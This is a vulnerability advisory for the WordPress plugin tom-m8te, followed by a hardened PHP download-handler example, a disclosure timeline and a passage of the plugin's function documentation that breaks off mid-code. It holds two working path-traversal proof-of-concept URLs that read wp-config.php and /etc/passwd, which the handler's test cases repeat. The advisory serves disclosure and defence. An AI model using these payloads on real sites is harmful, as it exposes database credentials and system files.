wp-plugin : tom-m8te – Local File Inclusion

 

Plugin Details

Plugin Name : tom-m8te
Affected Version : 1.5.3 (and most probably lower versions, if any)
Vulnerability : Local File Inclusion
Identified by : Anant Shrivastava

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC (Proof of Concept) :

1) http://localhost/wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../wp-config.php
2) http://localhost/wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd

Vulnerable parameter : file

Screenshot: tom-m8te LFI
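The PoC above reads wp-config.php and /etc/passwd through the plugin's download endpoint because the value of the file parameter is handed to the filesystem unchecked. The following is an added example of how such a download handler can be hardened; it is not the plugin's code. The function names tom_safe_download_path and tom_serve_download, the download directory, and the sample file are assumptions for illustration.

```php
<?php
// Added example (not the plugin's code): a download handler that only serves
// regular files from one fixed directory. Function names, the directory and
// the sample file are assumptions for illustration.

/**
 * Resolve $requested against $baseDir and return the absolute path, or null
 * if the request escapes the directory, names something that is not a
 * regular file, or contains characters a file name should not have.
 */
function tom_safe_download_path(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    // Only a bare file name is accepted: no directory separators at all.
    // This is stricter than realpath() alone and blocks "../" sequences
    // as well as absolute paths such as /etc/passwd.
    if (basename($requested) !== $requested) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // the download directory itself is missing
    }

    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null; // does not exist, or is not a regular file
    }

    // realpath() follows symlinks, so re-check containment in case a
    // symlink inside the directory points outside it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $target;
}

/**
 * Send the file, or a 404 if the name was rejected. The rejected name is
 * never echoed back, so the response leaks nothing about the filesystem.
 */
function tom_serve_download(string $baseDir, string $requested): void
{
    $path = tom_safe_download_path($baseDir, $requested);
    if ($path === null) {
        http_response_code(404);
        exit('File not found.');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
    exit;
}

// Self-check against a constructed temporary directory so the example runs
// stand-alone from the command line.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tom_downloads_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'report.pdf', 'constructed sample');

    // Constructed cases: expected result is whether the name is served.
    $cases = [
        'report.pdf'             => true,  // legitimate file in the directory
        '../../../wp-config.php' => false, // shape of the advisory's first PoC
        '/etc/passwd'            => false, // absolute path
        'missing.pdf'            => false, // not present in the directory
        "report.pdf\0.txt"       => false, // NUL byte in the name
    ];
    foreach ($cases as $name => $expectAllowed) {
        $allowed = tom_safe_download_path($dir, $name) !== null;
        printf("%-28s %s\n", addcslashes($name, "\0"), $allowed === $expectAllowed ? 'ok' : 'FAIL');
    }

    unlink($dir . DIRECTORY_SEPARATOR . 'report.pdf');
    rmdir($dir);
}
```

Run it with the php CLI to see the self-check. Inside a WordPress plugin the same check would sit behind a capability or nonce check as well, since the advisory's point is that the endpoint is reachable unauthenticated; the 404 branch deliberately returns the same response for traversal attempts and for genuinely missing files.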

 

Disclosure Timeline

Vendor Contacted : 2014-02-19
Plugin Status : Closed
Public Disclosure : May 28, 2014
CVE Number : Not assigned yet
 
Plugin Description :

Tom M8te provides useful functions that you can use in your plugins, such as a function for adding social share links and database manipulation functions.

The social links link to Facebook and Twitter share links.

Facebook: https://www.facebook.com/sharer/sharer.php?u=

Twitter:  http://twitter.com/intent/tweet?url=


Functions:

------------------------------------------------

tom_get_month_list()

Returns an array of months of the year.

------------------------------------------------

tom_add_social_share_links($url)

$url = (string) The url of a site you wish for your users to share.

Creates a share website link for Facebook and Twitter.

------------------------------------------------

tom_write_to_file($write_content, $location)

$write_content = (string) Content to save to file.

$location = (string) The physical file location of the file to save the content to.

Save content to a file.

------------------------------------------------

tom_write_to_htaccess_file($rule_name, $content)

$rule_name = (string) The name of the rule block. Example: WP ERROR LOG

$content = (string) The htaccess content to add. Example: "\norder allow,deny\ndeny from all\n\nphp_flag log_errors on\nphp_value error_log error_log"

Write content to the htaccess file.

------------------------------------------------

tom_is_file_writable($file)

$file = (string) Path to file to test.

Returns true if the file is writable, false if it isn't.

------------------------------------------------

tom_is_file_readable($file)

$file = (string) Path to file to test.

Returns true if the file is readable, false if it isn't.

------------------------------------------------

tom_javascript_redirect_to($url, $non_javscript_content = "")

$url = (string) The url to direct the page to.

$non_javscript_content = (string)(optional) Textual content for those who do not have javascript enabled.

Redirects the page to a particular URL using JavaScript. Sometimes this is easier than a PHP redirect, because of the "headers already sent" issue.

------------------------------------------------

tom_titlize_str($str)

$str = (string) The string you wish to titlize.

Titlizes a string. For example: status_level would become Status Level.

------------------------------------------------

tom_is_valid_datetime($datetime)

$datetime = (string) The string to test for datetime.

Checks to see if the parameter is a datetime. Returns true if it's a date or datetime, false if it's not.

------------------------------------------------

tom_is_valid_email($email)

$email = (string) The string to test for email.

Checks to see if the parameter is an email. Returns true if it's an email, false if it's not.

------------------------------------------------

tom_is_valid_emails($emails)

$emails = (string) The string to test for emails, separated by commas. Example: test@test.com.au,joke@hotmail.com

Returns true if the parameter contains a list of emails separated by commas.

------------------------------------------------

tom_get_query_string_value($name, $index)

$name = (string) The name of the query string value. It can be the name of a $_POST or $_GET key, but $_POST takes precedence.

$index = (integer)(optional) Default = -1. Index number of the query string array item.

Gets the value from the query string without having to use the $_POST or $_GET variables directly. $_POST takes precedence over $_GET.

------------------------------------------------

tom_fix_http_quotes($http_data)

$http_data = (string) The post/get data.

Fixes up HTTP POST/GET variables so that they present quotes correctly rather than escaped like (\').

------------------------------------------------

tom_upload_file($field_name)

$field_name = (string) The name of file input field.

Allows you to upload a file.

------------------------------------------------

tom_send_email($is_html, $to_emails, $to_cc_emails, $to_bcc_emails, $from_email, $from_name, $subject, $body, $alt_body = "", $attachments = array(), $smtp_auth = false, $smtp_mail_host = "", $smtp_mail_port = "", $smtp_mail_username = "", $smtp_mail_password = "", $secure_array = array())

$is_html = (boolean) True if you want to send HTML emails, False if you just want to send text emails.

$to_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$to_cc_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$to_bcc_emails = (string) or (array) Can be a string of emails to send to separated by commas or array of email addresses. Example: ("test@test.com", "joke@hotmail.com") or (array("test@test.com" => "Test Mate", "joke@hotmail.com" => "Joker Name")).

$from_email = (string) The email address of the sender.

$from_name = (string) The name of the sender.

$subject = (string) The subject of the email.

$body = (string) The actual email.

$alt_body = (string) Content that appears if HTML is not supported.

$attachments = (array)(optional) Array of attachments. Example array("img/logo.png", "img/attachment.jpg").

$smtp_auth = (boolean)(optional) Use smtp authentication and use your smtp server instead of built in PHP.

$smtp_mail_host = (string)(optional) Mail host. Example: mail.domain.com.au.

$smtp_mail_port = (string)(optional) Your smtp port. Usually 25.

$smtp_mail_username = (string)(optional) Your smtp username.

$smtp_mail_password = (string)(optional) Your smtp password.

$secure_array = (Array)(optional) Array of security algorithms used by your SMTP server. Example array("tls"), array("ssl") or array("tls", "ssl"). "tls" and "ssl" are the only two values acceptable for this parameter.

Allows you to send an email. Returns a success or error message.

------------------------------------------------

tom_generate_datatable($table_name, $fields_array, $primary_key_name, $where_clause, $order_array = array(), $limit_clause = "", $page_name, $display_show = true, $display_edit = true, $display_delete = true)

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$fields_array = (array) An array of field names will be selected as part of the sql query. For example: array("id", "name", "address").

$primary_key_name = (string) Name of primary key field. Needs to be in the $fields_array.

$where_clause = (string)(optional) The SQL Where clause without the keyword WHERE.

$order_array = (array)(optional) An array of fields you wish to order the records by with order direction. For example: array("id DESC", "name ASC"). If null, there will be no order.

$limit_clause = (integer)(optional) The number of records to limit by. If null, there is no limit and all records matching $where_clause will be selected.

$page_name = (string)(optional) The name of the page you want the show,edit,delete,pagination links to link to. Example: get_option("siteurl")."/wp-admin/admin.php?page=ventura-feedback-form/ventura-feedback-form.php"

$display_show = (boolean)(optional) Make show links visible. Default is true. It appends &action=show&id={{record_id}} to the link.

$display_edit = (boolean)(optional) Make edit links visible. Default is true. It appends &action=edit&id={{record_id}} to the link.

$display_delete = (boolean)(optional) Make delete links visible. Default is true. It appends &action=delete&id={{record_id}} to the link.

$sortable_columns = (boolean)(optional) Make columns sortable. Default is false.

$paginate_table = (boolean)(optional) Add pagination to the table. Default is false. The number of records per page is controlled by $limit_clause.

$date_format = (string)(optional) You can change the format of your dates. Default is Y-m-d.

$filter_array = (array)(optional) You can set up a filter system. Default is no filter. For example: array(array("status" => array("type" => "select", "value_options" => array("" => "", "Draft" => "Draft", "Published" => "Published"))),array("suburb" => array("type" => "text"))). Type can be text, select, radio, etc and option_values is only applicable to select, radio and checkbox.

------------------------------------------------

tom_generate_displayview($table_name, $fields_array, $id_column_name, $id)

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$fields_array = (array) An array of field names will be selected as part of the sql query. For example: array("id", "name", "address").

$id_column_name = (string) Name of primary key field. Needs to be in the $fields_array.

$id = (integer) The id value of the record you wish to display.

Generates a definition list with data from a record in the database.

------------------------------------------------

tom_compress_content($content)

$content = (string) The content you wish to compress.

Returns compressed version of $content.

------------------------------------------------

tom_get_form_query_strings($table_name, $exclude_fields = array(), $include_field_values = array())

$table_name = (string) The name of table to create, without the prefix. The prefix is auto added in for you.

$exclude_fields = (array)(optional) Array of field names to exclude in query string. For example: array("confirm_date", "active").

$include_field_values = (array)(optional) Array of query string values to include. For example: array("updated_at" => $current_datetime, "created_at" => $current_datetime).

Returns array of query strings from a form. Works out the $_POST and $_GET array names from the database table column names.

Example:

tom_update_record_by_id("ventura_feedback_forms",
                tom_get_form_query_strings("ventura_feedback_forms", array("created_at", "updated_at"), array("updated_at" => gmdate( 'Y-m-d H:i:s'))), "ID", $_POST["ID"]);

------------------------------------------------

tom_validate_form($validations_array)

$validations_array = (array) Array of validations. Example: array("project_number" => "required", "completion_date" => "required date", "rating" => "integer"). The key is the field name and the value is the type of validation. Currently the method can only accept required, integer and date validation.

Returns true if the form submitted is valid, false if not. When a form field is invalid, it adds an error message to your tom_add_form_field method.

Example:

$array_validation_rules = array("project_number" => "required", "completion_date" => "required date", "rating" => "integer", "start_price" => "currency");

if (isset($_POST["action"])) {

  if ($_POST["action"]
